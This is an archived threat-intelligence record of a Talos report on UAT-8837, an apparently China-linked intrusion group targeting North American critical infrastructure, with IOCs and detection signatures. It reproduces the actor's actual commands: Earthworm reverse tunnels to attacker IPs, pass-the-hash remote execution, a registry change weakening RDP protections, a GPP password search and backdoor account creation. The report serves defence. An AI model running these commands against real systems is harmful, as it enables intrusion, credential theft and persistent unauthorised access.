{
	"id": "c6bf8c10-26fc-4475-9990-8cdb0db508a7",
	"created_at": "2026-04-06T00:20:17.849336Z",
	"updated_at": "2026-04-10T03:36:01.598674Z",
	"deleted_at": null,
	"sha1_hash": "3dcfdf5a8f1f152f33fe7c98dbfdf99f596127f8",
	"title": "UAT-8837 targets critical infrastructure sectors in North America",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 74901,
	"plain_text": "UAT-8837 targets critical infrastructure sectors in North America\r\nBy Asheer Malhotra\r\nPublished: 2026-01-15 · Archived: 2026-04-05 15:40:10 UTC\r\nThursday, January 15, 2026 06:00\r\nCisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor based on overlaps in tactics, techniques, and procedures\r\n(TTPs) with those of other known China-nexus threat actors.\r\nBased on UAT-8837's TTPs and post-compromise activity Talos has observed across multiple intrusions,\r\nwe assess with medium confidence that this actor is primarily tasked with obtaining initial access to high-value organizations.\r\nAlthough UAT-8837's targeting may appear sporadic, since at least 2025, the group has clearly focused on\r\ntargets within critical infrastructure sectors in North America.\r\nAfter obtaining initial access — either by successful exploitation of vulnerable servers or by using compromised\r\ncredentials — UAT-8837 predominantly deploys open-source tools to harvest sensitive information such as\r\ncredentials, security configurations, and domain and Active Directory (AD) information to create multiple\r\nchannels of access to their victims. The threat actor uses a combination of tools in their post-compromise hands-on-keyboard operations, including Earthworm, Sharphound, DWAgent, and Certipy. The TTPs, tooling, and\r\nremote infrastructure associated with UAT-8837 were also seen in the recent exploitation of CVE-2025-53690, a\r\nViewState Deserialization zero-day vulnerability in SiteCore products, indicating that UAT-8837 may have access\r\nto zero-day exploits.\r\nPost-compromise actions\r\nUAT-8837 can exploit both n-day and zero-day vulnerabilities to gain access to target environments. 
Most\r\nrecently, UAT-8837 exploited a ViewState Deserialization zero-day vulnerability in SiteCore products, CVE-2025-53690,\r\nto obtain initial access.\r\nAfter UAT-8837 gains initial access, they begin conducting preliminary reconnaissance, leveraging the following\r\ncommands:\r\nping google[.]com\r\ntasklist /svc\r\nnetstat -aon -p TCP\r\nwhoami\r\nquser\r\nhostname\r\nnet user\r\nhttps://blog.talosintelligence.com/uat-8837/\r\nPage 1 of 8\n\nThe threat actor disables RestrictedAdmin for Remote Desktop Protocol (RDP) to obtain credentials for remoting\r\ninto other devices:\r\nREG ADD HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000\r\nA shell console may subsequently be opened via “cmd.exe” to conduct hands-on keyboard activity on the\r\ncompromised endpoint. Multiple artifacts are then downloaded to the following directories which were\r\nextensively used for staging artifacts:\r\nC:\\Users\\\u003cuser\u003e\\Desktop\\\r\nC:\\windows\\temp\\\r\nC:\\windows\\public\\music\r\nUAT-8837 may use a variety of tooling throughout the course of an intrusion. This variation in tooling may be\r\nbecause many of these tools are detected and blocked by most security products such as Cisco Secure Endpoint\r\n(CSE) which often leads the threat actor to cycle through different variants of the tools to find versions that are not\r\ndetected.\r\nGoTokenTheft\r\nThe GoTokenTheft utility is a tool for stealing access tokens. Written in GoLang and deployed at C:\\Users\\\r\n\u003cuser\u003e\\Desktop\\go.exe, it may be used to steal tokens to run commands with elevated privileges:\r\neee.ico REG ADD HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0\r\nEarthworm\r\nEarthworm is a network tunneling tool that has extensively been used by Chinese-speaking threat actors in\r\nintrusions to expose internal endpoints to attacker-owned remote infrastructure. 
UAT-8837 deploys multiple\r\nversions of Earthworm to determine which are not detectable by endpoint protection products. The undetected\r\nversion is then used to create a reverse tunnel to attacker-controlled servers, as seen in the commands below:\r\nC:\\Windows\\Temp\\v.ico -s rssocks -d 172[.]188[.]162[.]183 -e 1433\r\n \r\nC:\\users\\public\\videos\\verr.ico -s rssocks -d 172[.]188[.]162[.]183 -e 443\r\n \r\nC:\\Windows\\Temp\\eir.ico -p 8888 -t 172[.]188[.]162[.]183 -f 11112\r\n \r\ncisos.ico -s rssocks -d 172[.]188[.]162[.]183 -e80\r\n \r\nvgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 443\r\n \r\nvgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 447\r\nabc.ico -s rssocks -d 4[.]144[.]1[.]47 -e 448\n\nC:\\users\\public\\music\\aa.exe -s rssocks -d 74[.]176[.]166[.]174 -e 443\n\nC:\\Users\\public\\Music\\twd.exe -s rssocks -d 20[.]200[.]129[.]75 -e 443\nDWAgent\nUAT-8837 deploys DWAgent, a remote administration tool, to make it easier to access the compromised endpoint\nand drop additional malware to the system:\nC:\\Users\\\\Downloads\\dwagent.exe\nC:\\Users\\\\AppData\\Local\\Temp\\dwagent20250909101732\\runtime\\dwagent.exe -S -m installer\nSharpHound\nPer Talos’ observations, UAT-8837 downloads SharpHound with the intention to collect Active Directory\ninformation:\nC:\\Windows\\Temp\\SharpHound.exe\nImpacket\nUAT-8837 makes several attempts to download Impacket-based binaries to use in their operations:\nC:\\Windows\\Temp\\wec.ico\nWhen Impacket is detected and blocked, Invoke-WMIExec is downloaded to run commands with elevated\nprivileges:\nC:\\Windows\\Temp\\Invoke-WMIExec.ps1\nGoExec\nIn one intrusion, after cycling through a number of tools, UAT-8837 deployed GoExec, a GoLang-based remote\nexecution tool to execute commands on other connected remote endpoints within the victim’s network:\ngoe.ico wmi proc 10[.]xx[.]xx[.]xx -u /\n\n-H -e 'cmd.exe' -a '/C hostname /all' 
-o-\nC:\\Windows\\Temp\\goe.exe wmi proc 10[.]xx[.]xx[.]xx \\\ngoe.ico wmi proc 10[.]xx[.]xx[.]xx -u /\n\n--nt-hash -e cmd.exe -a /C hostname -o 1.txt\ngoe.ico wmi proc 10[.]xx[.]xx[.]xx -u --nt-hash -e cmd.exe -a /C hostname -o 1.txt\ngoe.ico wmi proc 10[.]xx[.]xx[.]xx -u --nt-hash 00000000000000000000000000000000: -e cmd\ngoe.ico dcom mmc 10[.]xx[.]xx[.]xx -u --nt-hash 00000000000000000000000000000000: -e cmd\ngoe.ico wmi proc 10[.]xx[.]xx[.]xx -u -p -e cmd.exe -a /C hostname -o 1.txt\ng.ico dcom mmc 10[.]xx[.]xx[.]xx -u -p -e cmd.exe -a /C ipconfig -o-\ng.ico wmi proc 10[.]xx[.]xx[.]xx -u -p -e cmd.exe -a /C hostname -o-\nIt is worth noting here that the usage of GoExec was likely an on-the-fly decision by the operator, necessitated by\nthe constant detection and blocking of the threat actor's tooling by CSE.\nThe threat actor also attempted to download and execute SharpWMI in the compromised environment, which was\nagain detected by CSE:\nC:\\Windows\\Temp\\s.ico\nRubeus\nRubeus, a C# based toolset for Kerberos abuse, may also be deployed:\nC:\\Windows\\Temp\\r.ico\nC:\\Windows\\Temp\\lo.txt\nCertipy\nUAT-8837 also deploys Certipy, a tool for AD discovery and abuse, to:\nC:\\Windows\\Temp\\Certipy.exe\nHands-on-keyboard activity\nUAT-8837 may run a series of commands during the intrusion to obtain sensitive information, such as credentials\nfrom victim organizations:\nfindstr /S /l cpassword [\\\\]\\policies\\*.xml\n The system’s security configuration is also exported using secedit:\nsecedit /export /cfg C:\\windows\\temp\\pol.txt\r\n Windows Local security policies extracted via secedit include password policies, user rights and audit settings.\r\nThis information may be valuable to adversaries who seek to evaluate an endpoint's security posture including\r\nnetwork security settings.\r\nIn one victim organization, UAT-8837 exfiltrated DLL-based 
shared libraries related to the victim’s products,\r\nraising the possibility that these libraries may be trojanized in the future. This creates opportunities for supply\r\nchain compromises and reverse engineering to find vulnerabilities in those products.\r\nDomain reconnaissance\r\nThe net commands typically used to query domain groups and users are:\r\nnet group domain admins /domain\r\nnet localgroup administrators /domain\r\nnet group \u003cname\u003e /domain\r\nnet user \u003cuser\u003e \u003cpassword\u003e /domain\r\nnet user \u003cuser\u003e /domain\r\nnet accounts /domain\r\nnet user \u003cuser\u003e /domain\r\nnltest /DCLIST:\u003cdomain\u003e\r\nnslookup \u003csubdomain\u003e.\u003cdomain\u003e\r\n The setspn command is used to list and query Service Principal Names (SPN) data from Active Directory:\r\nsetspn -L\r\nsetspn -Q */*\r\nActive Directory reconnaissance\r\nUAT-8837 deploys a combination of tools to perform AD reconnaissance in the compromised environment. These\r\ntools include SharpHound and Certipy. The threat actor also uses the Windows-native tool “setspn” to query for\r\nAD data. However, UAT-8837 also brings their own living-off-the-land (LOTL) tooling. 
In one intrusion, the actor\r\ndeployed dsget and dsquery to query for specific properties in the AD:\r\ndsquery.exe user -limit 0\r\n \r\ndsquery.exe user -name \u003cname\u003e\r\n \r\ndsget user -samid -display -email -upn\r\n \r\ndsget.exe user -samid -display -email -upn\r\n \r\ndsquery.exe user -samid \u003cid\u003e\r\n \r\ndsget.exe user -display -email -upn\r\n \r\ndsquery.exe user -name admin\r\n \r\ndsget.exe user CN=\u003cid\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\u003cdomain\u003e,DC=com -samid -display -e\r\n \r\ndsget.exe user CN=\u003cid\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\u003cdomain\u003e,DC=com -upn\r\n \r\ndsget.exe user CN=\u003cid\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\u003cdomain\u003e,DC=com -memberof\r\n \r\ndsget.exe user CN=\u003cid\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\u003cdomain\u003e,DC=com -disabled\r\n \r\ndsquery * DC=prod,DC=\u003cdomain\u003e,DC=com -filter (objectClass=user) -attr * -limit 0\r\nBackdoored user accounts\r\nThe threat actor created user accounts to open up another channel of access to the compromised environment:\r\nnet user \u003cuser\u003e \u003cpassword\u003e /add /domain\r\nIn another instance, UAT-8837 added an existing user account to local groups:\r\nnet user \u003cuser\u003e\r\n \r\nnet localgroup \u003cgroup\u003e \u003cuser\u003e /add\r\nCoverage\r\nThe following ClamAV signature detects and blocks this threat:\r\nWin.Malware.Earthworm\r\nThe following Snort Rules (SIDs) detect and block this threat:\r\nSnort 2 – 61883, 61884, 63727, 63728\r\nSnort 3 – 300585, 63727, 63728\r\nIndicators of compromise (IOCs)\r\nThe IOCs for this threat are also available at our GitHub repository here.\r\n1b3856e5d8c6a4cec1c09a68e0f87a5319c1bd4c8726586fd3ea1b3434e22dfa – GoTokenTheft\r\n451e03c6a783f90ec72e6eab744ebd11f2bdc66550d9a6e72c0ac48439d774cd - 
Earthworm\r\nB3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b – Earthworm\r\nFab292c72ad41bae2f02ae5700c5a88b40a77f0a3d9cbdf639f52bc4f92bb0a6 – Earthworm\r\n4f7518b2ee11162703245af6be38f5db50f92e65c303845ef13b12c0f1fc2883 - Earthworm\r\n891246a7f6f7ba345f419404894323045e5725a2252c000d45603d6ddf697795 - GoTokenTheft\r\n5090f311b37309767fb41fa9839d2770ab382326f38bab8c976b83ec727e6796 – SharpHound\r\n6e8af5c507b605a16373e8453782bfd8a3ec3bd76f891e71a159d8c2ff2a5bb0 – Impacket\r\n887817fbaf137955897d62302c5d6a46d6b36cb34775e4693e30e32609fb6744 – GoExec\r\n4af156b3285b49485ef445393c26ca1bb5bfe7cdc59962c5c5725e3f3c574f7c - GoExec\r\n1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183 – SharpWMI\r\n51d6448e886521aaaaf929a50763156ceb99ede587c65de971700a5583d6a487 – Rubeus\r\n2f295f0cedc37b0e1ea22de9d8cb461fa6f84ab0673fde995fd0468a485ddb59 – Rubeus\r\nE27e6e8e97421593f1e8d66f280e894525e22b373248709beaf81dc6107fb88d – Certipy\r\nB7ecd4ff75c0e3ed196e1f53d92274b1e94f17fa6c39616ce0435503906e66fb\r\n42e3ad56799fbc8223fb8400f07313559299496bb80582a6cbae29cb376d96c3\r\n6d20371b88891a1db842d23085a0253e36cf3bf0691aee2ae15a66fc79f3803d\r\n4e8304040055d3bffcb3551873da45f66577723d1a975416a49afa5aec4eb295\r\nBDF7B28DF19B6B634C05882D9F1DB73F63252F855120ED3E4DA4E26F2C6190E8\r\n1c5174672bf2ccedb6a426336ca79fd326e61cd26dd9ae684b8ffd0b5a70c700\r\nd0beb6184ea4402c39e257d5912c7ace3607e908e76127014e3ec02866b6d70c\r\n194ca1b09902ceaaa8a7e66234be9dc8a12572832836361f49f1074eae861794\r\n74e68b4e07d72c9b8e0bc8cbfd57f980b4a2cd9d27c37bb097ca4fb2108706e3\r\nCed14e8beb20a345a0d6f90041d8517c04dbc113feff3bc6e933968d6b846e31\r\n8bf233f608ea508cd6bf51fb23053d97aa970b8d11269d60ce5c6e113e8e787a\r\n5391f69425217fa8394ebac0d952c5a3d1f0f5ac4f20587978cd894fdb6199cd\r\n8bc008a621c5e3068129916770d24ee1d7d48079ee42797f86d3530ca90e305c\r\nDe9c13b1abeab11626a8edc1385df358d549a65e8cc7a69baca84cd825acc8e7\r\n4d47445328bfd4db12227af9b57daab4228244d1325cba572588de237f7b2e98\r\n74[.]176[.]166[.]17
4\r\n20[.]200[.]129[.]75\r\n172[.]188[.]162[.]183\r\n4[.]144[.]1[.]47\r\n103[.]235[.]46[.]102\r\nSource: https://blog.talosintelligence.com/uat-8837/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-8837/"
	],
	"report_names": [
		"uat-8837"
	],
	"threat_actors": [
		{
			"id": "86abe737-6f26-477b-b163-37f4f55d2e8a",
			"created_at": "2026-01-23T02:00:03.294379Z",
			"updated_at": "2026-04-10T02:00:03.933223Z",
			"deleted_at": null,
			"main_name": "UAT-8837",
			"aliases": [],
			"source_name": "MISPGALAXY:UAT-8837",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434817,
	"ts_updated_at": 1775792161,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3dcfdf5a8f1f152f33fe7c98dbfdf99f596127f8.pdf",
		"text": "https://archive.orkl.eu/3dcfdf5a8f1f152f33fe7c98dbfdf99f596127f8.txt",
		"img": "https://archive.orkl.eu/3dcfdf5a8f1f152f33fe7c98dbfdf99f596127f8.jpg"
	}
}